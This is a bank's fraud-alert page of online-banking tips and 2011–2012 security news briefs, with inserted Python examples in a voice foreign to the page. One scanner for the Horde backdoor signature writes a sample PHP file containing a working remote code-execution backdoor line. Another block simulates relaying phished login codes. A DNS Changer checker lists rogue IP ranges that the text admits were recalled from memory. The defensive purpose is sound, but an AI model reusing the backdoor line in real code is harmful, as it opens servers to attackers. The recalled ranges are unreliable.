Fraud Alert Message Center
Tips for Safe Banking Over the Internet
As use of the Internet continues to expand, more banks are using the Web to offer products and services or otherwise enhance communications with customers.
The Internet offers the potential for safe, convenient new ways to shop for financial services and conduct banking business, any day, any time. However, safe banking online involves making good choices - decisions that will help you avoid costly surprises or even scams.
- Consumer Best Practices for Online Banking
- Business Best Practices for Online Banking
- Recommendations for Online Fraud Victims
Current Online Threats
We have been informed of a fraudulent FDIC email scam targeting business customers. The FDIC will not send you unsolicited email regarding your bank or your bank accounts. If you receive an email purporting to be from the FDIC, do not open it. The email could potentially contain a virus or malware.
FDIC email abuse can be reported to us and directly to the FDIC at alert@fdic.gov (the FDIC's domain is fdic.gov; messages from any other domain claiming to be the FDIC should be treated as suspect).
Major Banks, Merchants Impacted by Marketing Company Hack
The list of banking institutions and retailers affected by the Epsilon e-mail breach continues to grow.
So far, Citi, Chase, U.S. Bank, Capital One, Barclays Bank of Delaware, Verizon, Walgreens, Visa, Kroger, Marriott International, Ritz-Carlton Rewards, Brookstone, New York & Co., TiVo, HSN and L.L. Bean are among the confirmed entities hit by what some observers say could be one of the biggest data breaches to date.
Epsilon, an online marketing unit of Alliance Data Systems Corp., announced on April 1 that an outside party had gained unauthorized access to some of its customer files. Epsilon sends e-mail campaigns and offers to consumers who register for a company's website or who give their e-mail addresses while shopping. Epsilon sends more than 40 billion e-mails annually and also runs loyalty programs for Citi and Chase credit card users. Epsilon's databases house consumer names and e-mail addresses that cybercriminals could use for targeted phishing, better known as spear phishing, attacks: a message that addresses you by name and names a company you actually do business with is far more convincing than a generic one.
In a brief statement, Epsilon says it detected a breach on March 30 during which "clients' customer data were exposed by an unauthorized entry into Epsilon's e-mail system."
Subsequently, Chase and U.S. Bank both issued statements last week telling customers they should be wary of phishing e-mails.
'Biggest Breach We Have Ever Seen'
Epsilon says it does not suspect any financial information has been compromised. But it's likely just a matter of time before personal and financial information is exploited, says Neil Schwartzman, founder and chief security specialist at Montreal-based CASL Consulting.
"It is the biggest breach we have ever seen," Schwartzman says. "And to say no financial information has been stolen is, well, understating the massive breach and concern."
To date, the largest known incident is the Heartland Payment Systems data breach, which impacted an estimated 130 million payment cards.
Though it is still too early to confirm the depth and breadth of the Epsilon breach, Schwartzman says he expects the list of affected companies and institutions to continue to grow. He also says Epsilon should be held to account for not adequately protecting sensitive consumer information. "Some of the most fundamental steps of protecting consumer data were not taken here," he says.
(Security National Bank does not subscribe to any services offered by Epsilon)
2/21/12
Fake Facebook notification delivers keylogger. Fake Facebook notifications about changes in users’ account information have been hitting inboxes and delivering malware to unwary users, warn Barracuda Labs researchers. The sender’s e-mail address is spoofed to make it look like the message was sent by the social network, and the message contains only an image implying that the recipient needs to install Silverlight in order to view the content. Hovering the mouse over the image shows that the offered file is a Windows PIF file (an executable format, whatever the link text suggests) and that it is hosted on an IP address in Malaysia. The file is actually a keylogger, the Jorik Trojan. Once the keylogger is installed, it starts recording every keystroke and Web page title into a disk file, which is ultimately sent to a C&C server operated by cyber criminals.
New powerful bot spreads by e-mail. PandaLabs reported the presence of a powerful new bot called Ainslot.L. This malware is designed to log user activities, download additional malware, and take control of users’ systems. Additionally, it acts as a banker Trojan, stealing log-in information related to online banking and financial transactions. Ainslot.L also performs scans on the computer to seek and remove other bots, becoming the only bot on one’s system. “What makes this bot different is that it eliminates all competition, leaving the computer at its mercy,” explained the technical director of PandaLabs. Ainslot.L spreads via a fake e-mail purporting to come from a UK clothing company called CULT. The message informs users that they have placed an order in the amount of 200 pounds on CULT’s online store and the invoice amount will be charged to their credit card. The text includes a link to view the order which actually downloads the bot onto the computer.
Android suddenly the top target as mobile malware rises sharply, study finds. The amount of malicious code written for mobile devices, such as smart phones and tablets, jumped by 155 percent in 2011 and has grown more sophisticated, according to a new report from Juniper Networks’ Mobile Threat Center. The magnitude of the growth is surprising, said Juniper’s vice president of government affairs and critical infrastructure protection. “It’s a direct result of consumer demand.” Spyware makes up the bulk of identified mobile malware, accounting for 63 percent. SMS Trojans account for 36 percent of mobile malware. The amount of malware written for Android increased exponentially in 2011, going from 400 identified samples in June to more than 13,000 in December. In 2010, more than 70 percent of identified malware was written for Java ME, with another 27 percent for Symbian; BlackBerry, Android, and Windows Mobile were small enough to be grouped together as “other.” In 2011, Android was the top target, with nearly 47 percent of identified malware, while Java ME had dropped to a still substantial 41 percent and Symbian accounted for 11.5 percent.
Cybercriminals building intricate, multiuse malnets. Cybercriminals have gotten so sophisticated that they can build an intricate network infrastructure and use it repeatedly for the distribution of malware, according to a new study from Blue Coat Systems. These malware networks, or malnets, lure targets through trusted Web sites, then route them to malware through relay, exploit, and payload servers to deliver the malware payload. While malnets are becoming increasingly sophisticated, Blue Coat said these assets can be identified and the malware attacks blocked. However, the Blue Coat Systems 2012 Security Report notes that these malnets are constantly on the move, making them hard to pin down. In one case, in early February, a malware payload changed locations more than 1,500 times in a single day.
2/17/12
Java SE updates fix critical security holes. Oracle fixed 14 security holes in the Java Standard Edition (Java SE) with a critical patch update. The vulnerabilities allow attackers to use specially crafted Java Web Start applications or Web services to install malicious code on computers that run flawed versions of Java. Oracle said such flawed versions are particularly likely to be exploited on Windows computers because Windows users tend to run with administrative privileges. The risk is smaller under operating systems such as Linux and Solaris, the company added. The holes, five of which are rated as maximum-risk vulnerabilities, affect the JDK (Java Development Kit) and JRE (Java Runtime Environment) 7 Update 2, JDK and JRE 6 Update 30, JDK and JRE 5.0 Update 33, and SDK and JRE 1.4.2_35, and earlier releases of each. Versions older than JavaFX 2.0.2 are also affected. Oracle closed the holes in Java SE 7 Update 3, Java SE 6 Update 31, and JavaFX 2.0.3. The updates are available for Windows, Linux, and Solaris. Under Windows, the updates will be installed automatically via auto-update. Otherwise, the patches can be downloaded from the Java download page and installed manually.
2/15/12
Horde’s FTP server hacked, files maliciously altered. The developers of the popular open source Web mail solution Horde identified a number of manipulated files on their FTP server. They concluded the server had been breached and the files stored on it altered to allow unauthenticated remote PHP execution. “We have immediately taken down all distribution servers to further analyze the extent of this incident, and we have worked closely with various Linux distributions to coordinate our response,” Horde officials said. After the investigation was concluded, the servers were replaced and secured, and the altered files were replaced with clean copies. The analysis found three files had been manipulated on different occasions and served to unsuspecting users for about 3 months: Horde 3.3.12 was manipulated November 15, 2011, Horde Groupware 1.2.10 November 9, 2011, and Horde Groupware Webmail Edition 1.2.10 November 2, 2011. Since the incident was found February 7, users who downloaded the files during this timeframe are advised to immediately reinstall using fresh copies from Horde’s FTP server, or to upgrade to more recent versions that have been released since. Horde 4 releases were not affected, and neither were the project’s CVS and Git repositories. The affected Linux distributions will provide notifications and security updates of their own. Users who are uncertain whether they are exposed can manually verify whether or not their installation was altered by searching for the $m[1]($m[2]) signature in the Horde directory tree.
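The manual check described above, written out as a small scanner, is an added example and not code from the Horde project. It walks a directory tree and reports every file containing the literal signature $m[1]($m[2]) that Horde named. The sample tree it builds (one clean PHP file and one carrying the pattern) is constructed for this example; the backdoor line in it is a hypothetical illustration of the pattern, not the real injected code, and a hit should be confirmed by diffing the file against a clean copy of the same release.

```python
import os
import tempfile

# Signature the Horde project said to search for in tampered releases.
HORDE_BACKDOOR_SIGNATURE = "$m[1]($m[2])"


def find_tampered_files(root):
    """Walk a Horde directory tree and return the paths (relative to root,
    using forward slashes) of files containing the backdoor signature.
    Files are read as bytes so binary assets and odd encodings do not
    abort the scan; unreadable files are skipped."""
    needle = HORDE_BACKDOOR_SIGNATURE.encode()
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if needle in fh.read():
                        rel = os.path.relpath(path, root)
                        hits.append(rel.replace(os.sep, "/"))
            except OSError:
                continue
    return sorted(hits)


def build_sample_tree():
    """Constructed sample tree (not real Horde code): one clean PHP file and
    one carrying the backdoor pattern, so the scanner can run offline."""
    root = tempfile.mkdtemp(prefix="horde-scan-")
    os.makedirs(os.path.join(root, "lib", "Horde"))
    with open(os.path.join(root, "lib", "Horde", "Clean.php"), "w") as fh:
        fh.write("<?php\nfunction hello() { return 'ok'; }\n")
    with open(os.path.join(root, "lib", "Horde", "Tampered.php"), "w") as fh:
        # Hypothetical illustration of the pattern: a regex capture group is
        # called as a function with a second capture group as its argument.
        fh.write("<?php\n"
                 "if (preg_match('/(\\w+)\\((.*)\\)/', $_GET['x'], $m)) { $m[1]($m[2]); }\n")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for hit in find_tampered_files(sample_root):
        print("possible tampering:", hit)
```

Run it against the real installation with find_tampered_files("/path/to/horde"); the signature is matched as raw bytes, so the check is unaffected by the PHP file's encoding or by the surrounding code being minified.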
Google clamps down on its prepaid Google Wallet card on smartphones. Google said it temporarily disabled the provisioning of its prepaid Google Wallet cards used in some NFC-ready phones. The move follows discovery of a vulnerability in Google Wallet described February 8 by security researchers at Zvelo.com. A second vulnerability for accessing Google Wallet prepaid card funds was outlined by The Smartphone Champ February 9. On February 11, the vice president of Google Wallet and Payments said the step was taken as a “precaution until we issue a permanent fix soon.” The move was intended to address “unauthorized use of an existing prepaid card balance if someone recovered a lost phone without a screen lock.”
2/14/12
Valve: Hackers may have gained access to Steam transactions. Valve Software confirmed that unknown intruders who gained access to the database for its Steam game distribution platform in an attack late in 2011 may have obtained a copy of a backup file of customer transactions. In a news post, Valve’s co-founder and managing director said the backup file included transactions from between 2004 and 2008, adding that it contained user names and e-mail addresses, as well as encrypted billing addresses and credit card information. This data did not include Steam account passwords, which were reportedly not accessed. He went on to note Valve has no evidence the credit card numbers and billing details were compromised, but again advised users to carefully watch their credit card activity and statements as a precaution. The company is still investigating the intrusion and is working with law enforcement authorities.
2/13/12
Google Wallet hacked again, no root access required this time. On February 9, security firm Zvelo revealed a hack for Google Wallet that exposed a user’s PIN. The vulnerability only affected rooted phones, according to Google. Now, however, a second hack was posted online that works on non-rooted devices and requires no special hacking skills. All someone has to do to access a user’s funds is clear the data in app settings, which will force Google Wallet to prompt them to enter a new PIN. Once the new PIN has been entered, they can add a Google Prepaid Card that is tied to the device and access any available funds.
DDoS tools flourish, give attackers many options. According to a research analyst at Arbor Networks, there is now a thriving distributed denial of service (DDoS) tool and botnet ecosystem that includes single user flooding tools, small host booters, shell booters, remote access Trojans (RATs) with flooding capabilities, simple DDoS bots, complex DDoS bots, and some commercial DDoS services. Many types of threats can be blended into any given tool to make the tool more attractive and financially lucrative for whoever is renting out the DDoS capabilities. The researcher recently counted 55 different DDoS tools, which are just a fraction of what is publicly and commercially available. Some are more dangerous than others. For example, Fg Power DDOSER is designed to flood a gaming competitor with packets, slowing connection speed or knocking them offline, although the DDoS toolkit also includes a Firefox password stealer, he said. Another simple tool, Silent-DDoSer, can launch UDP, SYN, and HTTP attacks, and also offers “triple-DES and RC4 encryption, IPv6 capabilities, and password-stealing functions,” he said. At the other end of the spectrum, there are many complex DDoS toolkits and related bots, and typically also Web-based command-and-control interfaces. These toolkits sport names such as Darkness/Optima, DeDal, Dirt Jumper, G-Bot, and Russian Armageddon. Finally, services such as Death DDoS Service and Totoro offer commercial DDoS options, meaning that rather than running the tools themselves, attackers can outsource the job.
2/10/12
Foxconn said to have been hacked by group critical of working conditions. Hackers claimed to have stolen internal data from Apple supplier Foxconn, and leaked the information online, in response to media reports of poor working conditions at the electronics manufacturer’s factories in China. The hacker group, Swagg Security, announced the attack in a Twitter message February 8, and also leaked data stolen from the Foxconn site to The Pirate Bay. It said the data included user names and passwords. Foxconn declined to comment on the attack. Two service Web sites used by Foxconn’s customers to place orders were down February 9.
Google ships Chrome 17, touts more malware alerts and page preloads. Google patched 20 vulnerabilities in the desktop edition of Chrome February 8, and added new anti-malware download warnings to version 17. The company called out a pair of new features in Chrome 17, including the expansion of anti-malware download warnings and prerendering of pages suggested by the address/search bar’s auto-complete function. One of the 20 vulnerabilities patched was rated “critical.” Eight were marked “high,” while five were labeled “medium” and six were tagged “low.”
‘Factory outlets’ selling stolen Facebook/Twitter credentials at discount rates. Stealing credentials via Trojans has become so simple and prevalent that cybercriminals are finding themselves with a surplus: Two cybercrime gangs are now advertising bulk-rate Facebook, Twitter, and cPanel credentials in order to clean out their inventory. Researchers at Trusteer said these credential factory outlets are a way for the bad guys to cash in on other credentials they pilfered while stealing online banking credentials. It is like making money off the chaff that comes along with the valuable online banking credentials lifted by Trojans and keyloggers: “They harvest a lot of things” unrelated to the stolen online banking credentials, said the vice president of marketing for Trusteer. “This is how they monetize the [leftover] assets they harvest.” The ads were running in underground forums infiltrated by the researchers from Trusteer. Trusteer believes attackers could lure users to those sites via phishing e-mails and social networking messages.
2/9/12
Malware steals documents and uploads them to Sendspace. Security experts came across a piece of malware programmed to steal documents from the infected computer. The malicious element is designed to upload the obtained Microsoft Word and Excel files to the hosting site sendspace.com. Trend Micro researchers said Sendspace had been used previously to store stolen data because the service allowed crooks to “send, receive, track and share” big files, but the process had never before been automated by malware. The infection begins with an executable file called Fedex_Invoice(dot)exe, identified as TROJ_DOFOIL.GE, the file’s name hinting it may be spread with the use of a fake “FedEx failed delivery” spam campaign. Once the file is executed, it downloads and executes TSPY_SPCESEND.A, a trojan that searches the local drive for Word and Excel documents, collecting them in a password-protected archive placed in the user’s temporary folder. After the archive is created, it is uploaded to Sendspace and its download link is transmitted to the malware’s command and control (C&C) server. This way the crooks do not have to store all the files on the C&C; instead they access them from the file hosting service, and the exfiltration traffic itself looks like an ordinary upload to a legitimate site. This discovery means information theft and exfiltration are not confined to targeted attacks but are present in mass campaigns as well.
Attackers using fake Google Analytics code to redirect users to Black Hole Exploit Kit. Injecting malicious code into the HTML of legitimate Web sites is a key part of the infection lifecycle for many attack crews, and they often disguise and obfuscate their code to make it more difficult to analyze or to make it look like legitimate code. The latest instance of this technique has seen attackers employing code meant to look like Google Analytics snippets, but which instead sends victims off to a remote site hosting the Black Hole Exploit Kit. Researchers at Websense discovered the ongoing attack recently, and found the code being used to hide the fake Google Analytics tags is heavily obfuscated, making analysis quite difficult. The malicious code, which is being injected into benign pages on legitimate sites, is designed to look just like actual Google Analytics code and to appear as though it is referring to common domains.
Blackhole toolkit served by spam ahead of tax season. Symantec researchers came across a large number of spam messages that try to trick the recipient into clicking on a link that points to the Blackhole toolkit. More than 200 unique URLs were identified in a series of e-mails that urge users to verify their accounts after some discrepancies were supposedly identified by the sender company. The phony e-mails, apparently coming from a legitimate company, read: “With intent to assure that the exact information is being sustained on our systems, as well as to improve the quality of service we can provide to you; [COMPANY NAME] has participated in the Internal Revenue Service [IRS] Name and TIN Matching Program. We have found out, that your name and/or TIN, that we have on your account is different from the information on file with the Social Security Administration. In order to verify your account, please enter the secure section.” Once the link is clicked, the user is taken to a page containing more links that point to a JavaScript file called js.js. This file serves the Blackhole toolkit, which probes the victim’s computer for various vulnerabilities, the final payload being identified as Trojan.Zbot. The domains that host the malicious JavaScript file are not only newly registered domains but also legitimate domains that were hijacked by the cybercriminals who launched the campaign. Users are advised not to click on links in suspicious-looking e-mails, and also to avoid opening attachments, especially exe, zip, or pdf files.
Adobe sets IE as next target in Flash security work. Adobe plans to tackle Microsoft’s Internet Explorer (IE) in its ongoing work to “sandbox” its popular Flash Player within browsers, Adobe’s head of security said February 7. On February 6, Adobe released a beta version of a sandboxed Flash Player plug-in for Mozilla’s Firefox on Windows Vista and Windows 7 as a follow-up to a similar initiative in 2010 for Google’s Chrome. Next on the list is IE. “IE has a big chunk of the user base,” said Adobe’s senior director of security, products, and services. “We want to do what protects the most users the fastest.” According to Web metrics company Net Applications, IE accounted for 53 percent of all browsers used in January worldwide, more than double Firefox’s 21 percent and almost triple Chrome’s 19 percent. Adobe’s head of security declined to set a timetable for putting Flash within a sandbox inside IE.
2/7/12
Hackers may be able to ‘outwit’ online banking security devices. An investigation by BBC Click underlines possible shortcomings in the extra security provided by banking authentication devices such as PINSentry from Barclays and SecureKey from HSBC. Hackers could set up a fake banking Web site and prompt users attempting to log into their account for both their online log-in credentials and, for example, a PINSentry code. Relayed promptly, this information would allow cybercrooks to log onto the genuine banking Web site, posing as the customer, before authorizing fraudulent transfers or other payments. The weakness is that a code generated for login proves only that the customer holds the device; it is not bound to any particular transaction, so a code captured once can be used by whoever holds it for as long as it remains valid. This is a variant of the classic man-in-the-middle attack; when the same relaying is done by malware running inside the victim’s browser rather than by a fake Web site, it is known in security circles as a man-in-the-browser attack. Isolated incidents of this type of fraud have cropped up over recent years. While the attack is not new, it is doubtful that many consumers are aware of it.
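Why a relayed code works for login but need not work for a payment is easier to see in code. The following is an added example, not code from BBC Click, Barclays or HSBC, and the scheme it shows is a generic HMAC-based one: the device secret, the 30-second time step, the account numbers and the amounts are all constructed for the example and do not describe how any real device computes its codes. It contrasts a plain time-based login code with a code computed over the destination account and amount, then simulates the fake-site relay described above against both.

```python
import hmac
import hashlib
import struct

# Hypothetical shared secret provisioned into a customer's device
# (constructed for this example; never reuse a literal secret like this).
DEVICE_SECRET = b"example-device-secret-do-not-reuse"
TIME_STEP_SECONDS = 30


def _truncate(digest, digits=8):
    """RFC 4226 style dynamic truncation: pick 4 bytes at an offset taken
    from the last nibble of the MAC and reduce them to a decimal code."""
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, code % (10 ** digits))


def login_code(secret, timestep):
    """Time-based code that proves possession of the device but binds to
    nothing else: whoever learns it within the window can use it."""
    msg = struct.pack(">Q", timestep)
    return _truncate(hmac.new(secret, msg, hashlib.sha256).digest())


def transaction_code(secret, timestep, dest_account, amount_cents):
    """Code computed over the transaction details as well as the time step.
    The device shows the customer what it is signing, and a code phished
    for one payment does not verify for a different one."""
    msg = (struct.pack(">Q", timestep)
           + dest_account.encode("ascii")
           + struct.pack(">Q", amount_cents))
    return _truncate(hmac.new(secret, msg, hashlib.sha256).digest())


def bank_verifies_login(secret, timestep, presented):
    return hmac.compare_digest(presented, login_code(secret, timestep))


def bank_verifies_transaction(secret, timestep, dest_account, amount_cents, presented):
    expected = transaction_code(secret, timestep, dest_account, amount_cents)
    return hmac.compare_digest(presented, expected)


def relay_attack(secret, timestep):
    """Simulate the attack in the article: the victim types codes into a fake
    site and the attacker relays them to the real bank within the same time
    window, for a payment the victim never saw.  Returns a pair
    (login_relay_succeeds, transaction_relay_succeeds)."""
    victim_dest, victim_amount = "GB00VICTIM0001", 1_000       # what the victim sees
    attacker_dest, attacker_amount = "GB00MULE000001", 250_000  # what the attacker submits

    # The victim generates both codes on a genuine device; only the login
    # code is transaction-agnostic, so only it can be repurposed.
    phished_login = login_code(secret, timestep)
    phished_txn = transaction_code(secret, timestep, victim_dest, victim_amount)

    login_ok = bank_verifies_login(secret, timestep, phished_login)
    txn_ok = bank_verifies_transaction(secret, timestep,
                                       attacker_dest, attacker_amount, phished_txn)
    return login_ok, txn_ok


if __name__ == "__main__":
    step = 1_700_000_000 // TIME_STEP_SECONDS  # fixed time step for a repeatable run
    print("relay of login code succeeds, relay of transaction code succeeds:",
          relay_attack(DEVICE_SECRET, step))
```

The transaction-bound code only helps if the device displays the destination and amount it is signing and the customer reads them; a fake site that asks the customer to "confirm" an unfamiliar account number is the tell. It also does nothing against a man-in-the-browser that rewrites the details the customer sees on the bank's page, which is why banks pair such devices with back-end transaction monitoring.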
Facebook malware scam takes hold. A large number of Facebook users were sharing a link to a malware-laden fake CNN news page reporting the United States attacked Iran and Saudi Arabia, security firm Sophos said February 3. If users who follow the link click to play what purports to be video coverage of the attack, they are prompted to update their Adobe Flash player with a pop-up window that looks like the real thing. Those who accept the prompt unwittingly install malware. Within 3 hours of the scam’s appearance, more than 60,000 users followed a link to the spoofed CNN page, according to a Sophos senior security adviser. Facebook removed that link, but others were still being shared. In a statement, Facebook said it was “in the process of cleaning up this spam now, and remediating any affected users.”
2/6/12
Symantec warns of Android Trojans that mutate with every download. Researchers from Symantec identified a new premium-rate SMS Android Trojan that modifies its code every time it gets downloaded in order to bypass antivirus detection. This technique, known as server-side polymorphism, has existed in the world of desktop malware for many years, but mobile malware creators have only now begun to adopt it. A mechanism running on the distribution server modifies certain parts of the Trojan to ensure every malicious app that gets downloaded is unique. This differs from local polymorphism, where the malware modifies its own code every time it gets executed. Symantec identified multiple variants of this Trojan horse, which it detects as Android.Opfake, and all of them are distributed from Russian Web sites. However, the malware contains instructions to automatically send SMS messages to premium-rate numbers in many European and former Soviet Union countries. Especially when security products rely heavily on static signatures, detecting malware that makes use of server-side polymorphism can be difficult, since no two downloaded samples hash the same.
HP recalls fax machines due to fire and burn hazards. The U.S. Consumer Product Safety Commission, in cooperation with Hewlett-Packard (HP) announced a voluntary recall February 2 of about 928,000 HP fax 1040 and 1050 machines. The importer was Hewlett-Packard Co., of Palo Alto, California. The machines were manufactured in China. The fax machines can overheat due to an internal electrical component failure, posing fire and burn hazards. HP is aware of seven reports of machines overheating and catching fire, resulting in property damage, including one instance of significant property damage and one instance of a minor burn injury to a consumer’s finger. Six incidents were reported in the United States. The machines were sold at electronics, computer, and camera stores nationwide and online at www.shopping.hp.com and other Web sites from November 2004 through December 2011. Some of the recalled fax machines were replacement units for a previous recall involving HP fax model 1010 in June 2008.
Google beefs up Android Market security. Google unveiled a new security service for the Android Market February 2 that aims to auto-scan uploaded Android applications to detect potentially malicious apps more quickly, ideally before users download them. Codenamed Bouncer, the new service searches for threats without requiring any pre-approval process, continuing to keep the Market as “open” as it has always been. The new security service has already been working for the past few months. After finding an app that violates the rules — be it malware or spyware — the Android team takes the application down and bans the developer account from uploading any more apps. Further, Google continues to check new Android developer account sign-ups, so repeat offenders will not continue to upload malicious apps under different user names.
Half of Fortune 500 firms infected with DNS Changer. Half of all Fortune 500 companies and major U.S. government agencies own computers infected with the “DNS Changer” malware that redirects users to fake Web sites and puts organizations at risk of information theft, security company Internet Identity (IID) said February 2. DNS Changer, which at its peak was installed on more than 4 million Windows PCs and Macs worldwide — a quarter of them in the United States alone — was the target of a major takedown organized by the U.S. Department of Justice in November 2011. The takedown and accompanying arrests of six Estonian men, was dubbed “Operation Ghost Click.” As part of the operation, the FBI seized control of more than 100 command-and-control servers hosted at U.S. data centers. According to IID, half of the firms in the Fortune 500, and a similar percentage of major U.S. government agencies, harbor one or more computers infected with DNS Changer. IID used telemetry from its monitoring of client networks, as well as third-party data, to claim at least 250 of the Fortune 500 companies and 27 out of 55 major government agencies had at least one computer or router infected with DNS Changer as of early 2012.
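DNS Changer did its work by pointing a machine's (or a home router's) DNS settings at resolvers the criminals controlled, so the practical check is to compare the configured resolvers against the rogue address ranges. The scanner below is an added example, not code from Internet Identity or the FBI. The six ranges are the ones the FBI published for Operation Ghost Click as best I recall them; confirm them against the FBI's current list before relying on this in production. The resolv.conf text it parses is a constructed sample; on Windows the same check applies to the DNS servers shown by ipconfig /all, and on a home router to the DNS entries in its WAN settings.

```python
import ipaddress

# Rogue resolver ranges published for DNS Changer (Operation Ghost Click),
# transcribed from memory for this example; verify against the FBI's list.
DNSCHANGER_ROGUE_RANGES = [
    ipaddress.ip_network(cidr) for cidr in (
        "85.255.112.0/20",   # 85.255.112.0  - 85.255.127.255
        "67.210.0.0/20",     # 67.210.0.0    - 67.210.15.255
        "93.188.160.0/21",   # 93.188.160.0  - 93.188.167.255
        "77.67.83.0/24",     # 77.67.83.0    - 77.67.83.255
        "213.109.64.0/20",   # 213.109.64.0  - 213.109.79.255
        "64.28.176.0/20",    # 64.28.176.0   - 64.28.191.255
    )
]


def nameservers_from_resolv_conf(text):
    """Return the resolver addresses listed in resolv.conf-style text,
    ignoring comments and unrelated directives (search, options, ...)."""
    servers = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers


def rogue_resolvers(servers):
    """Return the subset of the given resolver addresses that fall inside a
    DNS Changer range.  Strings that are not IP addresses are skipped."""
    flagged = []
    for server in servers:
        try:
            addr = ipaddress.ip_address(server)
        except ValueError:
            continue
        if any(addr in net for net in DNSCHANGER_ROGUE_RANGES):
            flagged.append(server)
    return flagged


# Constructed sample, not taken from a real host: one public resolver,
# one address inside a rogue range, one private address.
SAMPLE_RESOLV_CONF = """# constructed sample
search example.internal
nameserver 8.8.8.8
nameserver 85.255.115.20   # inside 85.255.112.0/20
nameserver 10.0.0.1
"""


if __name__ == "__main__":
    servers = nameservers_from_resolv_conf(SAMPLE_RESOLV_CONF)
    bad = rogue_resolvers(servers)
    print("configured resolvers:", servers)
    print("DNS Changer resolvers:", bad or "none")
```

To check a live Linux host, pass the contents of /etc/resolv.conf to nameservers_from_resolv_conf. A hit means the machine or the router in front of it has been reconfigured, and the fix is to restore legitimate resolvers and then clean the infection that changed them, since the malware will otherwise change them back.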
2/3/12
Official EA forum hacked and defaced, data is secure. Unnamed hackers managed to breach the security measures implemented by Electronic Arts (EA) on its official forum (forum.ea.com) after successfully exploiting a vulnerability they identified in the software that runs the site (possibly a Java app). Voice Of Grey Hat said the company’s marketing manager came forward with a statement to reassure users the security hole was patched and their personal information was not exposed at any time. “As some of you noticed, the homepage of the forums was defaced by a hacker yesterday using a very new exploit for the software which runs the forums. This was noticed quickly and we took the action to take the forums offline while we investigated the details. This work is now complete, and the vulnerability we believe was used has now been fixed,” he said. “There is no evidence that any personal data was compromised, and as passwords aren’t stored in a recoverable manner, we are confident they remain secure.”
Key Internet operator VeriSign hit by hackers. VeriSign Inc., the company in charge of delivering people safely to more than half the world’s Web sites, was hacked repeatedly by outsiders who accessed undisclosed information from the leading Internet infrastructure company. The previously unreported breaches occurred in 2010 at the company, which is ultimately responsible for the integrity of Web addresses ending in .com, .net, and .gov. VeriSign said its executives “do not believe these attacks breached the servers that support our Domain Name System network,” which ensures people land at the right numeric Internet Protocol address, but it did not rule anything out. VeriSign’s domain-name system processes as many as 50 billion queries daily. Pilfered information from it could let hackers direct people to faked sites and intercept e-mail from federal employees or corporate executives, though classified government data moves through more secure channels. The VeriSign attacks were revealed in a quarterly U.S. Securities and Exchange Commission (SEC) filing in October 2011 that followed new guidelines on reporting security breaches to investors. Even if the name system is safe, VeriSign offers a number of other services where security is paramount. The company defends customers’ Web sites from attacks and manages their traffic, and it researches international cybercrime groups. VeriSign would possess sensitive information on customers, and its registry services that dispense Web site addresses would also be a natural target. The SEC filing said security staff responded to the attack soon after it happened, but failed to alert top management until September 2011.
Counterclank stays on Android Market, Symantec gives more explanations. After mobile security firm Lookout argued Android.Counterclank is not a piece of malware as Symantec labeled it, the latter came forward with new arguments to back its initial decision to warn users of potential dangers. Symantec’s update reveals that even Google decided the apps met its terms of service and that removal from the Android Market was unnecessary. The developers accused of serving malicious apps also came forward to deny their products are malware. “WE ARE NOT MALWARE!! Symantec, the company that wrongly labeled this app as malware the other day, have contacted us and are in the process of un-doing the mistake they did and whitelisting our product,” the developers wrote on Android Market. On the other hand, Symantec argued it needs to keep users informed about behaviors of some applications that may pose a threat to regular users. “The situation we find ourselves in is similar to when Adware, Spyware, and Potentially Unwanted Applications first made appearances on Windows. Many security vendors did not initially detect these applications, but eventually, and with the universal approval of computer users, security companies chose to notify users of these types of applications,” they said. Symantec now brings further details to support its initial arguments about the dangers presented by the applications in question. It revealed that the Tonclank and Counterclank apps come from the same vendor, a company that distributes a software development kit (SDK) to third parties with the purpose of helping them monetize their applications, mainly through search.
2/2/12
Malware redirects bank phone calls to attackers. Trusteer has discovered a concerning development in new configurations of Ice IX, a modified variant of the ZeuS financial malware platform, that are targeting online banking customers in the United Kingdom (UK) and United States. “In addition to stealing bank account data, these Ice IX configurations are capturing information on telephone accounts belonging to the victims ... allow[ing] attackers to divert calls from the bank intended for their customer to attacker controlled phone numbers,” the chief technology officer (CTO) of Trusteer said. He believes “the fraudsters are executing fraudulent transactions using the stolen credentials and redirecting the bank’s post-transaction verification phone calls to professional criminal caller services that approve the transactions.” In one captured attack, at login the malware steals the victim’s user ID and password, memorable information/secret question answer, date of birth, and account balance. Next, the victim is asked to update phone numbers and select the name of their service provider from a drop-down list. To enable the attacker to modify phone service settings, the victim is then asked by the malware to submit their telephone account number. The fraudsters justify this request by stating this data is required as part of a verification process caused by “a malfunction of the bank’s anti-fraud system with its landline phone service provider.” The lesson for customers is that a bank will not ask for telephone account details inside the online banking session; such a prompt is a sign the browser itself has been compromised.
Hacker extracts RFID credit card details. The widespread use, especially in U.S. credit cards, of radio frequency identification (RFID) chips, which can be read through clothing or wallets for contactless payments, can lead to cards being read without the owner’s knowledge or permission, H Security reported February 1. Forbes reported January 30 that a hacker at the Shmoocon security conference in Washington D.C. demonstrated the ability to read data from RFID-chipped credit cards and make a payment that had not been authorized by the card owner. With about 100 million RFID cards issued, this can now be done without card owners handing over their cards, and no security measures such as card reader authentication are in place. However, the RFID data does not include the three-digit CVV number printed on the back of the card that is usually required when making an online transaction. Instead, the chip issues a one-time CVV that is valid for only one transaction; reusing that value causes the card to be blocked, which limits what a skimmed read is worth to a single fraudulent purchase. In the United States, Visa markets RFID credit cards as payWave, and in the United Kingdom (UK) as Contactless by Visa. Mastercard markets its RFID credit cards as PayPass in the United States and UK.
Trymedia breach exposes credit card numbers of 12,000 digital game customers. Trymedia’s ActiveStore Web-based storefront application, which processes digital game purchases made by customers on its partners’ Web sites, was recently breached, exposing credit card numbers and other personal information of more than 12,000 customers, Infosecurity reported January 31. Trymedia told the New Hampshire Attorney General’s Office it believes hackers were able to obtain credit card numbers, expiration dates, security codes, and postal and e-mail addresses from optional user accounts for transactions between November 4 and December 2. Trymedia said it would notify the 12,456 affected customers by postal mail about the potential breach and offer a 12-month subscription to a credit-monitoring and identity-theft protection product.
2/1/12
